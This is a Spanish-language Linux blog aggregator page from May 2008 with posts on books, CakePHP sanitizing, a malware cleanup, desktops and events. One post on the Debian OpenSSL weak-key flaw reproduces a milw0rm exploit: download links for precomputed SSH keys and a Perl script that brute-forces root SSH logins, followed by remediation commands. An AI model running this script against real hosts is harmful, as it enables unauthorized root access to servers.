Planeta Linux México

Fco. de la Torre Inguanzo: Entre el ángel y el fierro, Francisco Villa

linuxman — vie, 16 may 2008 14:37:24 +0000

Aprovechando la venta nocturna no pude evitar comprar este libro.

Entre el ángel y el fierro, Francisco Villa de Enrique Krauze.

Sobre todo porque estaba a un excelente precio, pero aunque hubiera estado un poco más caro igual lo hubiera comprado.

El archivo de fotos que maneja, su formato con hojas de un tinte amarilliento y tipografía de prensa de la época lo hacen una excelente opción para aquel que se quiera enterar de manera resumida la biografía del que considero el más grande héroe de la Revolución Mexicana.

El que quiera conocer la historia de la Revolución forzosamente tiene que leer la vida de Villa.

David Valdez: usando sanitize

david.valdez210@gmail.com (David Valdez) — vie, 16 may 2008 07:37:00 +0000

CakePHP nos regala una clase para sanear datos,es decir quitar todo aquel carácter raro que podría afectar la seguridad de nuestra aplicación (para mas detalles, leer acerca de XSS)

Demos un vistazo rápido al uso de esta clase:

Lo primero es declarar que vamos a usar sanitize.

uses("sanitize");

Después por ejemplo queremos eliminar cualquier carácter no alfanumérico (es decir, que no sea letras ni números) podemos usar el método paranoid de la siguiente forma

$foo = Sanitize::paranoid($foo);

Pero si queremos preservar en la cadena algún carácter no alfanumérico, simplemente se lo pasamos como un segundo argumento al método.

$foo = Sanitize::paranoid($foo,array("@",".","_"));

Otro método interesante es el html que nos permite convertir los caracteres especiales del html (ej <,>,/, &, etc) en sus entidades (ej &,< etc).

$baz = Sanitize::html($baz);

O bien que funcione como la función "strip_tags" de php y nos quite todas las etiquetas de la cadena, simplemente agregando un argumento false al método:

$bar = Sanitize::html($bar,false);

El método escape nos permite sanear una consulta a la base de datos:

$bar = Sanitize::escape($bar);

Además tenemos funciones como stripWhitespace (quita espacios), stripImages (quita imagenes), stripScripts(quita cualquier indicio de una llamada a un script) o si queremos una forma de hacer todo esto al mismo tiempo sin tener que ejecutar los tres tenemos a stripAll que nos limpia nuestra cadena de, espacios, imágenes y scripts.

Para mas referencia ver la referencia en el sitio de cakephp

David Valdez: Un poco de tiempo y un buen CMS

david.valdez210@gmail.com (David Valdez) — vie, 16 may 2008 07:19:00 +0000

Hace poco Josue me dijo que estaba trabajando en una nueva versión de su blog, al ver el resultado final me ha dejado muy sorprendido.

Nuevo Imagen del blog de Blacknash

Solo me queda decir que es increíble lo que se puede hacer con un poco de tiempo libre y un excelente CMS como Textmotion

Víctor Martínez: Debo de repetir...

vicm3@hotmail.com (Víctor Manuel Martinez Martinez) — vie, 16 may 2008 07:17:53 +0000

Cuando pruebes software que viene de fuentes non santas o sin verificar, correlo en una maquina virtual... como qemu u otro.

Bueno me precio de que hace mucho que mi maquina de escritorio no se ha infectado de ninguna cosa... en fin estuve buscando evaluar un programa para recuperar información de memorias flash /usb/ CF, etc. Bueno ejecute un par en mi lap... directamente con el antivirus (avira) activado y debo decir que pesque un trojano bastante interesante flec006.exe un proceso que no podia matar, que tuvo a bien desactivar mi antivirus e insertarse como parte del anillo 0 de !Windows XP!, en otras palabras que intentar bajar algun ejecutable para removerlo resultaba en que lo que descargaba se contaminaba.

Bueno de la busqueda en google me encontre con una descripcion mas o menos de donde se mete y como se oculta, resulto que un par de herramientas mencionadas en foros, nomas le hicieron cosquillas (he de mencionar que en esa maquina tengo alguna información financiera que en cualquier otro caso me hubiera llevado a tener que cambiar las contraseñas de un par de sitios, pero estoy usando ccrypt desde hace algun tiempo, ya que no confio en la encripción de win - y por que en cierta maquina con home edition me di cuenta que ni incluyen encripción, si se que truecrypt es más user friendly, pero me gusto mas ccrypt-) bueno decidido a tirar la cosa esta directito a entrar al modo seguro, resutla que este malware tiene la bondad de modificar el modo seguro para mandar un BSOD. Fantastico, entonces pues a buscar en el registro como se ejecuta (si, sin respaldar el mismo, recuerdenme mi propio quote of the day de hace un par de dias) y lo encontre, pero recordando el articulo de trend micro me encontre que se podria poner en muchisimos lugares más, bueno di por perdida la batalla esa noche, puesto que también tenia que exponer en pocas horas.

Como nota aparte no es una queja con avira, puesto que es un Antivirus que me gusta mucho (tanto que de hecho me anime a pagar la licencia del premium, por que el costo no se me hizo excesivo y ha mantenido la lap de Jo limpia de madrolas, claro que con cierta costumización de mi parte -que recomiendo, primera acción desinfectar, segunda eliminar, no hacer preguntas, revisar medios removibles, etc.) pero el hecho es que en la oficina se utiliza Nod32 y las ultimas 3 semanas la usb que utilizo allá ha regresado casi 2 veces por semana con trojanos que no detecta el Nod32 y que mucho menos elimina, antes de eso estuvimos usando f-secure, que terminamos cambiando por la enorme cantidad de recursos que necesita y a que virus muy comunes se le estaban escapando, como añadido varias maquinas de reciente compra venian con el mcafee de fabrica y puedo decir que sale peor, en alguna de estas maquinas le dedique casi una hora a desinstalar el mismo y colocar el nod32 para poder eliminar la cantidad de cosas que tenian, eso mas el spyware, que normalmente no toma en cuenta el AV, ha hecho que maquinas bastante respetables Dell GX280 1GB RAM, Pentium IV 3.1GHZ se arranen y al menos una fuente paso a mejor vida (probablemente por un fallo en el ventilador)... bueno todo este choro para decir que ultimamente he visto que los antivirus estan realmente perdiendo la batalla... parecen coladeras.

En fin veamos que herramientas se pueden usar para esto, ya que estando en un entorno contaminado descontaminar resulta realmente dificil... me encontre BartPE que permite construir un livecd de Windows, digamos que el builder ha mejorado muchisimo, pero el soporte para dispositivos de red aún deja mucho que desear, no hablemos de correr aplicaciones que requieran ser instaladas, no está tán dificil, pero no es para quien tiene prisa y mucho menos para alguien que esta sufriendo una infección de un virus/malware/trojan/spyware despues de 2 builds y de no lograr levantar la tarjeta de red broadcom, lei en su foro que el Ultimate boot disk cd for Win (UBCD4WIN) incluia todo lo que estaba tratando de hacer al BartPE... bueno es diferente descargar 3MB a 255MB sin embargo el procedimiento es muy similar (para cualquiera de los dos requieren tener el disco de instalación de win o su iso) este ultimo incluye Avast, Avira y spybot entre los programas que mete en el livecd.

Aunque claro la solución más rapida y que ya prepare desde el momento en que me entere de que esto no solo era trojano sino downloader y que añadia plugins, bueno lo primero fue borrar todo lo de firefox (aún cuando uso password para proteger los passwords) y borrar el directorio que tengo encriptado en esa maquina (que tengo bajo subversion al igual que el de trabajo de la oficina) una vez hecho eso, empece con toda la saga que escribo arriba, por cierto que hice una copia de los archivos de mis usuarios a mi particion con Debian (vaya que ha mejorado el soporte para NTFS, no lo he probado con utf8, pero al menos con iso8859 no me permitio borrar algunas cosas con acentos), ya teniendo esa copia, es probable que formatee esa partición y termine reinstalando XP... (una ventaja tambien de tener un service tag de dell y todos los drivers necesarios, he de mencionar que esa maquina venia con Vista Basic), he de mencionar que tambien probe utilizar f-prot desde linux, el cual no logro hacer gran cosa.

En fin aún cuando data de antes de que comenzara este blog por mucho, algo similar en cuanto a desmadrar mi maquina en fechas de entrega de tesis me paso en la licenciatura, en aquella epoca por querer probar una utileria libre para mover particiones y poder instalar linux... (allá por 1999)... hoy día leccion aprendida.

1) Mis archivos de tesis estan bajo control de versiones y el mismo tiene un respaldo que no esta fisicamente cercano (en USA).

2) Mi información importante se encuentra cifrada con ccrypt y los passwords de Firefox están protegidos con un master password (en algun momento solo use el cifrado de win, que es transparente al usuario, pero en mi pc mas viejita eso es realmente lento y debe ser inutil en el caso de una infección de trojano).

3) Cuento con más de una maquina, esto cuando estaba haciendo la licenciatura, realmente me creo un problema tremendo, que culmino con la perdida total de la versión digital de la misma, ademas de con unas conclusiones que no tuvieron toda la atención que debieran haber tenido.

4) Debo usar una maquina virtual, me cuesta menos trabajo hacer un cp Winxp a Win.test y lanzar qemu, que tener que reinstalar una maquina real (digo con los discos de ahora que es hacer una copia de 2GB de la imagen nada más para probar).

Es curioso que el primer mandamiento de los antivirus de antaño "utilice un disco de arranque que sea construido en un entorno que no este comprometido", ya no aplique, recuerdo haber leido esto en la epoca de Viruscan en MSDOS. Cuando se hablaba de Cairo y lo que seria posteriormente Win95, (acabo de notar que el Avira en la opción de extras, tiene la posibilidad de descargar un bootcd), en fin es realmente curioso que los antivirus actuales lo ofrezcan como un extra y no como un requisito para poder mantener el sistema limpio eso mas que por ahi lei que los nuevos rootkits van a ser más dificiles de encontrar (si así estan los trojanos, va a ponerse buena la cosa, pronto).

Update 2:38pm El CD de Avira, esta basado en linux... usa isolinux + busybox + NTFS-3G todo esto GPL2 de hecho dice en el propio about, que para todas las partes que son GPL del mismo el fuente esta disponible contactando a support arroba avira punto com.

Update 3:04pm Worm Bagle fue de lo que me dejo este bicho, por cierto remplazando el driver del touchpad (synaptics) y probablemente este fue el culpable de desactivar el AV en combinación con el otro, vía el UBCD con el spybot localice 6 entradas en el registro al bagle y al menos 2 binarios en system32/drivers infectados, el bootdisk de avira encontro el de synaptics, se extraña el poder hacer un renice y darle mayor prioridad al scanner ;D

Update 4:17pm Yo aqui pensando en que esta cosa se esta tardando mucho y ahorita le muevo al teclado me entero que ha encontrado muchas mas ocurrencias de los trojanos (en recycler y en sytem volume information) pero que ademas esta scaneando mi sistema linux!, por eso es que se esta llevando muchismo mas tiempo del que pense, no conte con que nativamente tendria soporte para ext3 :D, me parece que con mucho el bootcd de avira se lleva las palmas.

Update 6:18pm Termino Avira de scannear renombro muchisimos archivos, para eliminación como mencione antes tambien reviso mis particiones ext3 y encontro una "firma" rara en mi john the ripper... sin embargo ya estuvo bien de jugar... como ya tengo una copia de lo que tenian mis usuarios (2) en esta maquina, voy a formatearla.

Update 9:40pm Termine de recrear la partición, instalar win y poner todos los drivers de mi maquina, ah y poner el service pack 3... (2 horas y un cacho para hacer eso...mhh no estaria mal hacer una imagen) me faltan un buen de cosas, pero por el otro lado me deshice de un monton de software que ya no usaba. Tambien le he dado una revisada al texto añadido comas y corregido es iso 8859 para el charset.

Arturo Meza Perdomo: Mi GNU/Linux :) Ubuntu... screen de hoy

Spike (noreply@blogger.com) — vie, 16 may 2008 06:12:43 +0000

Pues que puedo decir amo a mi flakita y también a linux XD jajajaja.... bien pues la captura de hoy tiene: Compiz Fusion GIT, xmms, conky, terminator,.... así quedo después de un rato de configurar el conky... :)

Juan Pablo Ortiz Aréchiga: ¿Para que usar el X-JSON de Prototype?

pablasso — jue, 15 may 2008 23:58:04 +0000

En un canal de IRC, hoy una persona me hizo recordar un problema que tuvimos hace un par de semanas en la oficina porque los datos en JSON que regresaba una web, mágicamente desaparecían aun cuando antes estaba funcionando.

En ambos casos fue el mismo error, no se tenia contemplado que los datos enviados fueran a crecer demasiado eventualmente, y como X-JSON utiliza los headers de HTTP, tiene un tamaño limitado.

Yo realmente no le veo el punto de su existencia, ¿enviar estados de una página? ¿mensajes cortos? Para eso mejor utilizar headers correctos de HTTP y cualquier tipo de datos por el cuerpo de la página como fue pensado desde el principio, la confusión que puede crear es mayor que el beneficio.

Si lo dejas a mi opinión: No lo uses, evítalo.

Josué Gutiérrez: CSS Compressor

eusoj19.blacknash@gmail.com (unknown) — jue, 15 may 2008 23:46:00 +0000

"Robson CSS Compressor" is a great service to compress your CSS, also you can combine your files or if you want it, download the code.

César Espino: Free Windows.

César Espino — jue, 15 may 2008 22:06:07 +0000

Se que nadie lo sabemos todo, reconozco que soy un simple usuario de escritorio de GNU/Linux, estoy conciente que me faltan aprender muchas cosas, pero la afirmación que acabo de leer, estoy seguro me hubiera costado trabajo deducirla...

"Aun no entiendo como pueden existir personas que les guste Linux. Si al caso vamos, Windows tambien es software libre porque en todos los años que llevo usandolo nunca he pagado una licencia y no es ilegal ya que lo he bajado por intercambio de P2P, Es como si alguien que lo tiene original me lo prestara a mi..!"

Me ha alegrado el día, pueden leer el post "Linux Sucks" en el blog http://jondarodriguezleal.blogspot.com/

Víctor Martínez: Quote of the day

vicm3@hotmail.com (Víctor Manuel Martinez Martinez) — jue, 15 may 2008 17:49:43 +0000

"Note - editing partition tables is a dangerous pastime, so back up your filesystem before doing so."

From XFS FAQ

Edgar Casanova: [Reto] Matriz con entradas en espiral

dmind — jue, 15 may 2008 16:37:34 +0000

Matriz con entradas en espiral

Dados dos enteros m y n, escriba un programa que construya una matriz con m renglones y n columnas cuyas entradas sean los números 1,2,…, m*n acomodados en espiral, comenzando con el número 1 en la entrada que está en la esquina superior izquierda, siguiendo hacia la derecha, luego hacia abajo, luego hacia la izquierda, luego hacia arriba y así sucesivamente.

Entrada: Dos números enteros m, n, separados por un espacio, cuyos valores con entre 1 y 100

Salida: La matriz requerida(para mayor detalle, ver ejemplo de salida aunque no se requiere el mismo espaciado, solo el orden).

Ejemplo de entrada Ejemplo de salida 4 5

1 2 3 4 5 14 15 16 17 6 13 20 19 18 7 12 11 10 9 8

Para descargar el que resolvímos pica aquí.

Entradas Relacionadas

Víctor Martínez: Bueno esto parece haber pasado desapercibido...

vicm3@hotmail.com (Víctor Manuel Martinez Martinez) — jue, 15 may 2008 15:15:41 +0000

Y me imagino que pocos usan apticron o de plano no le han tomado demasiada importancia a la noticia

"GRAVES PROBLEMAS EN EL ALGORITMO QUE GENERA LOS NÚMEROS ALEATORIOS EN DEBIAN jueves, 15 de mayo de 2008 informativos.net La criptografía en Debian ha sufrido un grave revés. Se ha descubierto que el generador de números aleatorios del paquete OpenSSL de Debian es predecible. Esto hace que las claves generadas con él ya no sean realmente fiables o verdaderamente seguras. El problema tiene (y tendrá por muchos años) una importante repercusión y numerosos efectos colaterales en otros paquetes y distribuciones.

Debian ha publicado una actualización para OpenSSL que solventa múltiples vulnerabilidades, siendo la más grave un fallo en el generador de números aleatorios que los volvía predecibles, o sea, "poco aleatorios". Luciano Bello, desarrollador de Debian, daba la voz de alarma. Sólo afecta al OpenSSL de Debian porque esta distribución parchea su propia versión de OpenSSL, a su manera. En este caso, ha eliminado una línea crucial de código que limita el generador a producir sólo 2^18 claves (solamente 262.144), en vez de poder elegir claves de, por ejemplo 2^1.024 posibilidades.

Los sistemas de cifrado basados en criptografía asimétrica necesitan del cálculo de números aleatorios para generar claves de sesión, públicas y privadas... se basan en la aleatoriedad en general para un buen funcionamiento. De hecho, su seguridad radica en la aleatoriedad real de esos cálculos: cuanta más entropía, más complicado de predecir y más "calidad" del cifrado. Igual para la generación de claves.

El fallo fue introducido en la versión OpenSSL 0.9.8c-1 de septiembre de 2006. Al intentar solucionar un código aparentemente incorrecto con la herramienta Valgrind, se eliminó por error una línea crucial para el sustento entrópico de OpenSSL que nada tenía que ver. Se eliminaron más líneas de código de la cuenta. Valgrind es un programa que detecta y alerta sobre el uso de memoria no inicializada (lo que sería un fallo en cualquier otra aplicación) pero en OpenSSL es legítimo porque se utiliza para ganar entropía. Un claro ejemplo de lo peligroso de intentar solucionar un fallo sin entender completamente el problema, y de introducir cambios no supervisados en este caso, por los desarrolladores oficiales de OpenSSL..."

La nota completa en

Pero lo mas importante de todo es que muchas llaves ssh terminaron siendo vulnerables, como pueden leer en el DSA-1576 del 14 de Mayo.

Por cierto la entrada en el Wiki es un buen historico de como ha ido todo este show, tomado de alli:

"Identifying Weak Keys

Characteristics of potentially vulnerable keys:

Generated since 2006-09-17
Generated with Etch, Lenny or Sid (Sarge is not vulnerable)
Generated using 'openssl', 'ssh-keygen', or 'openvpn --keygen' (GnuPG and GNUTLS are not affected)

Additionally, simply the use of DSA keys may have compromised them. A strong key (i.e., generated with a 'good' OpenSSL) but used locally on a machine with a 'bad' OpenSSL must be considered to be compromised. This is due to an 'attack' on DSA that allows the secret key to be found if the nonce used in the signature is reused or known.

If you have used the vulnerable openssl version to generate an SSL key and then created a CSR from that key and sent it to a SSL certificate provider, then the certificate should be considered vulnerable."

Bueno de todo esto, en 2 maquinas tuve que regenerar las hostkeys... y tambien voy a tener que regenerar los certs del pop/ssl e imap/ssl. En fin es buena idea correr ssh-vulnkey en sus maquinas, por cierto Ubuntu al estar basado fuertemente en Debian, también es vulnerable. La falta de noticias al respecto me hace pensar que menos gente de la que yo creia utiliza autentificación via llaves.

C'est la vie.

Antonio Gurza: [SECURITY] [DSA 1571-1] New openssl packages fix predictable random number generator

zerial killer (noreply@blogger.com) — jue, 15 may 2008 16:10:44 +0000

Vulnerabilidad crítica en las claves OpenSSL de Debian y las basadas en debian tambien.

Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
Ubuntu Ubuntu Linux 7.10 sparc
Ubuntu Ubuntu Linux 7.10 powerpc
Ubuntu Ubuntu Linux 7.10 lpia
Ubuntu Ubuntu Linux 7.10 i386
Ubuntu Ubuntu Linux 7.10 amd64
Ubuntu Ubuntu Linux 7.04 sparc
Ubuntu Ubuntu Linux 7.04 powerpc
Ubuntu Ubuntu Linux 7.04 i386
Ubuntu Ubuntu Linux 7.04 amd64
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0

Anuncio en debian

en MilwOrm

the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.

This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.

On an unpatched system, which doesn't need to be debian, do the following:

keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

2. Extract it to a directory

3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)

4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.

#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By mm@deadbeef.de\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}

5. Enjoy the shell after some minutes (less than 20 minutes)

Regards,
Markus Mueller
mm@deadbeef.de

# milw0rm.com [2008-05-15]

Yo en mi sistema hice lo siguiente:

# rm /etc/ssh/ssh_host_*

Y después las he regenerado con:

# dpkg-reconfigure -plow openssh-server

Y todo perfecto.

Esto lo leei en un post de haplo en esDebian

Fco. de la Torre Inguanzo: Venta Nocturna de Libros en Torreón

linuxman — jue, 15 may 2008 14:38:57 +0000

Hoy hay una venta nocturna en la librería del Fondo de Cultura Económica, un descuento del 20% en todos los libros de esta Editorial.

Aunque la venta es nocturna, no creo que haya problema si van un poco antes, después de todo de trata de fomentar la lectura ¿o no?

No desaprovechen la oportunidad de comprar un buen libro.

Leonel Rubio: Me han copiado…

Leo_On — jue, 15 may 2008 14:17:20 +0000

Ayer navegando di con una “carbón copy” o copia al carbón de uno de mis manuales, es decir, tal cual lo copiaron, mismas imágenes, mismos errores ortográficos y todo, obviamente le borraron la parte donde dice mi autoría y no hicieron la debida referencia a mi blog como fuente del manual, me [...]

Emerson Posadas: Ponte a hacer algo

toxickore (noreply@blogger.com) — jue, 15 may 2008 12:00:16 +0000

Aprovechar el tiempo es precisamente lo que he estado haciendo en los últimos quince días. Tengo un sentimiento de culpa cuando pasan las horas y no hago cosas de provecho. Sucede que en este nuevo proyecto donde estoy hay muchos tiempos muertos ya que hay que estar monitoreando algunas chivas y pues monitorear no es precisamente algo que permite hacer algunas otras cosas.

Definitivamente en estos quince días he aprendido detalles sobre las 43P, la arquitectura de las pSeries, y en esta semana me dió por instalar y disque configurar un TSM; además me bajé por ahí algunos ebooks y me los ando requemando.
Bien pude haber dejado pasar esos quince días y seguir sabiendo las mismas tarugadas que me sé, pero honestamente eso me hubiera hecho sentir estancado y mediocre.

Cosas que he aprendido:

Las 43P no soportan LPARs
Nomenclatura de las interfaces de red en AIX ( /dev/en0 /dev/ent0)
Cambiar la velocidad de /dev/en0 /dev/ent0
Instalar software desde rpm's con smit
Configurar los parámetros básicos del TSM
Checar si una tarjeta de red tiene colisiones ( entstat -d [dev])
Habilitar el WSM
Revisar las propiedades de algún dispositivo (lsattr -El [dev])
Extender filesystems
Crear volúmenes en TSM
Habilitar el admnistrador vía web para el TSM (DSMSERV RUNFILE dsmserv.idl)
Localización de los logs del sistema /var/adm/

Y faltan algunas cosas mas por repasar y talachear; así el día se me va mas rápido, en vez de solamente estar perdiendo el tiempo viendo videos en youtube ;)

Óscar Tavares: Mi Escritorio xD

GnDx — jue, 15 may 2008 05:39:26 +0000

Mi escritorio un poco arreglado

Mañana que termine el script de conky se los paso, ya que mi amigo Bucio me motivo a realizar uno basado en otro agregándole mas funciones =D, para mañana espero tenerlo listo y subir los archivos y el proceso de instalación.

César González: Procesamiento digital de imágenes en GNU/Linux (2)

noreply@blogger.com (César) — jue, 15 may 2008 04:22:00 +0000

Para manipular las imágenes hay que cargarlas en el ambiente de trabajo que se desea usar.

Como mencioné en otra entrada, se puede hacer procesamiento digital de imágenes en octave, previa instalación de gnuplot e ImageMagick y después de haber instalado en octave el paquete Image de octave-forge.

Entonces para cargar una imagen y almacenarlar en una matriz en octave, se hace uso del mismo comando que en matlab:

octave> imagen=imread('imagen.formato')

En donde imagen, es el nombre de la imagen a cargar y el formato es la extensión del tipo de imagen a cargar, es decir, hay que poner el nombre completo de la imagen a cargar.

Por ejemplo, si se tiene una imagen llamada arroz.jpg en su directorio de trabajo, para cargar la imagen en una matriz llamada imagen_prueba, se escribe:

octave> imagen_prueba=imread('arroz.jpg')

Lo cual permite cargar los tres canales de color de la imagen en la matriz imagen_prueba.

Suponiendo una imagen de 40 x 40 pixeles , al pedir el tamaño de la matriz con el comando size, devuelve algo como:

octave> size(imagen_prueba)
40 40 3

Y si se desea visualizar la imagen, se hace con el comando imagesc (se puede usar también el comando imshow).

octave> imagesc(imagen_prueba) % despliega imagen_prueba

Como es una matriz, solo hay que aplicarle la teoría de procesamiento digitial de imágenes.

Por último, para trabajar la imagen en tonos de gris, se puede hacer con el comando rgb2gray, que genera una nueva imagen guardada en una matriz de dos dimensiones que solo tiene valores enteros entre 0 y 255.

octave>imagen_grises=rgb2gray(imagen_prueba)

En cualquier caso, para saber más sobre los comandos solo hay que teclear

octave > help imread
octave > help imagesc
octave > help size
octave > help imshow
octave > help rgb2gray
octave > help colormap

César Espino: Falló compiz-fusion después de actualización de Debian Lenny AMD64.

César Espino — jue, 15 may 2008 04:10:10 +0000

Hace unas horas actualicé mi desktop -Debian Lenny AMD64-, la descarga de la actualización fue de 203 megas, se actualizaron paquetes de X11, después de la actualización traté de arrancar compiz-fusion y no funciono, solucioné el problema reinstalando el driver de Nvidia -binario-, en la reinstalación del binario me marcó algunas fallas, seleccioné que las omitiera y se solucionó el problema con compiz-fusion.

Estoy usando el kernel 2.6.22-3-amd64, con el 2.6.24 aún no puedo instalar el driver de Nvidia.

Oswaldo Villa: InstallFest 2008 en Chihuahua

villatux (noreply@blogger.com) — mié, 14 may 2008 23:34:36 +0000

Se va a organizar un InstallFest el día 17 de Mayo del 2008 en La ciudad de Chihuhua, la sede será en el Edificio de Seminarios de la Facultad de Contaduría y Administración a partir de las 12 horas.

*Podrás traer tu Desktop o Portátil para Instalarle LInux o Software Linbre
*Aprende a Instalar Linux desde cero en tu propia computadora
*Aprende a manejar tu sistema Linux
*Comparaciones de Linux-Windows
*Únete a grupos de usuarios Linux locales
*Comparte información.Notas:
* El evento es totalmente Libre y gratuito
* Si Vas a instalar Linux en tu computadora, procura traer una partición de mas de 4GB para instalarle Linux, (Si no sabes hacerla, no te preocupes, nosotros te ayudamos el día del evento)Paginas con información relacionada:
http://installfest.mx.vg/ -- registro e infohttp://calendario.fsl.org.mx/mediawiki/index.php/Eventos -- calendario de FSL.Los que puedan asistir, ahí nos vemos!

Bernardo Mejía: Se necesita Internet Explorer

xanatos — mié, 14 may 2008 20:34:29 +0000

Ni hablar:

Mauro Parra: Ivan Krstić bitches...

mié, 14 may 2008 20:19:42 +0000

...and the world should hear him.

"My theory is that technical people, especially when younger, get a particular thrill out of dicking around with their software. Much like case modders, these folks see it as a badge of honor that they spent countless hours compiling and configuring their software to oblivion. Hey, I was there too. And the older I get, the more I want things to work out of the box. Ubuntu is getting better at delivering that experience for novice users. Serious power users seem to find that OS X is unrivaled at it."

Link: Ivan Krstić: sic-transit-gloria-laptopi

/me abraza su powerbook

Joel Barrios Dueñas: Torrentspy deberá pagar 111 millones de dólares en indemnizaciones.

Joel Barrios Dueñas (noreply@blogger.com) — mié, 14 may 2008 17:04:40 +0000

La juez federal de EE.UU. Florence-Marie Cooper dictaminó que TorrentSpy deberá pagar 111 millones de dólares como indemnización, es decir, 30 mil dólares por cada una de las 3699 violaciones demostradas por la MPAA (Motion Picture ASSociation of America). Esto representa la cifra más alta en la historia de derechos de autor. La MPAA contrató por 15 mil dólares a un experto en informática para obtener copias de los mensajes de correo electrónico del personal de Torrentspy, con lo cual fue reforzado el caso. Torrentspy dejó de operar hace más de un mes por orden de esta juez. Fuente: Libertad Digital.

Ver artículo original

Publicado con El navegador Flock

César Espino: Fundación Blender recibe carta de Microsoft.

César Espino — mié, 14 may 2008 15:36:55 +0000

Leyendo /. me entero de que Microsoft mandó una carta a Blender preguntando en resumen... ¿que podemos hacer para mejorar el funcionamiento de blender en Windows, que tipo de archivos impiden un funcionamiento óptimo?, aquí un parte del email:

"With respect to Blender, what can you tell me about your community/user feedback that you have heard regarding file formats? Specifically, Microsoft is slowly shifting toward a more open standards based approach to its file formats. The ISO standard Office Open XML is an example of the direction we are moving towards. A good user experience of Blender on Windows is good for your project/community and good for Microsoft. What we are trying to understand is what file formats, which are not open or not fully open, are impeding the optimal experience with your community".

Lo primero que se preguntan en el artículo es:

"OOXML is an example of openness? They're kidding, right?"

Sin meterme a cuestiones técnicas del formato que no me interesa conocerlas, para mi OOXML es la respuesta de Microsoft a la tendencia mundial de gobiernos de solicitar que los formatos en los que se guardará la información pública sean estándares, lo he dicho; Microsoft no es una dama de la caridad, es una empresa y como empresa debe de asegurar sus ganancias, solamente no nos vengan con el cuento de que ahora se interesan por los estándares mundiales con el fin del bien común.

Ahora este interés por que Blender funcione mejor en su operativo no me sorprende, Blender es un excelente programa que tiene gran cantidad de usuarios y el cual por lo menos a mi me ha funcionado mucho mejor en GNU/Linux que en windows. Creo que Blender no necesita de Microsoft y no debería hacer caso de ese canto de sirenas.

Argumentar que Microsoft se interesa por el Software Libre poniendo como ejemplo la aprobación de OOXML como estándar es todo un caso, recordemos que lo que cala es la risa, no el golpe.

¿Has probado Blender en windows?, ¿funciona mejor que en GNU/Linux?

Enrique Gómez: Phun, un jugete para físicos

aldeaglobal — mié, 14 may 2008 15:09:10 +0000

Vía wearesurvivalmachines.com me entero de un software adictivo, pero con la principal cualidad de ser educativo, al menos esa fue la intención al diseñarlo.

Se trata de Phun, en el cual en un entorno bidimensional se pueden crear elementos y dotarlos de características de gravedad, densidad y muchas más. Supongo que el nombre ha de ser algún juego de palabras en inglés entre física y diversión.

En el video de demostración se puede ver como simular un motor de combustión, jugar con una catapulta, etcétera. La verdad es bastante adictivo, hay foros de soporte y los adictos pueden compartir con la comunidad los videos de sus desarrollos.

Este software aún no tiene una licencia definida, aunque en las Faqs, el autor comenta la posibilidad de liberar el código. La versión 3.5 beta de Phun se encuentra disponible para Linux, MacOs y Windows.

Joel Barrios Dueñas: MySpace logra victoria legal contra Spammers y 234 millones de dólares como pago.

Joel Barrios Dueñas (noreply@blogger.com) — mié, 14 may 2008 15:40:16 +0000

MySpace logra victoria legal contra Spammers y 234 millones de dólares como pago. Ha sido el pago más grande desde que se puso en marcha la CAN-SPAM en EE.UU. (ley contra el correo masivo no solicitado en ese país), y significa que Sanford «Spamford» Wallace y Walter Rines están obligados a pagar a MySpace por los 700 mil mensajes de spam reportados como queja por los usuarios de MySpace. «El fallo judicial contra los spammers es astronómico , porque bajo los términos de la ley CAN-SPAM cada mensaje acredita a MySpace 100 dólares en daños. Eso se triplica cuando el spam es enviado 'a propósito y conscientemente'. En la guerra contra el spam está bien que las grandes compañías que padecen usen mano dura como en este caso para golpear a los spammers con ésta» dijo Graham Cluley, consultor ejecutivo de tecnología de Shopos. Fuente: Sophos.

Ver artículo original

Publicado con El navegador Flock

Enrique Gómez: R2D2 :: Un proyector muy geek

aldeaglobal — mié, 14 may 2008 14:16:13 +0000

Este proyector debe ser el sueño de todo geek aficionado a la saga de George Lukas, se trata de un proyector y cámara web con el mismo diseño del famoso robot de StarWars R2D2.

Este droide es fantástico, tiene puertos para usb y tarjetas de memoria, así como integración con Ipod, puede ser controlado via web o bien desde su control remoto original que emula al halcón milenário.

En la página del fabricante hay un video donde puedes ver a arturito en acción. Link del sitio aquí.

Carlos Augusto Lozano: All ready for BugCON v0.1

vend3tta@yahoo.fr () — mié, 14 may 2008 08:52:07 +0000

This Saturday, in Mexico City, we're going to celebrate the BugCON's firts edition, and all is ready for it.

We have opened new places for the people who did't register. Remember the acces is free.

Register: [ Click here ]
Conferences Schedule: [ Click here ]
Information about Speakers: [ Click here ]

We're waiting for you

José Oviedo: ¿Cuantas palabrar tecleas por minuto?

joviedo@gmail.com (José Oviedo Uribe) — mié, 14 may 2008 05:10:47 +0000

Visto en el blog de antoniomtz, cuantas palabras puedes teclear por minuto?.

55 words

Speed test

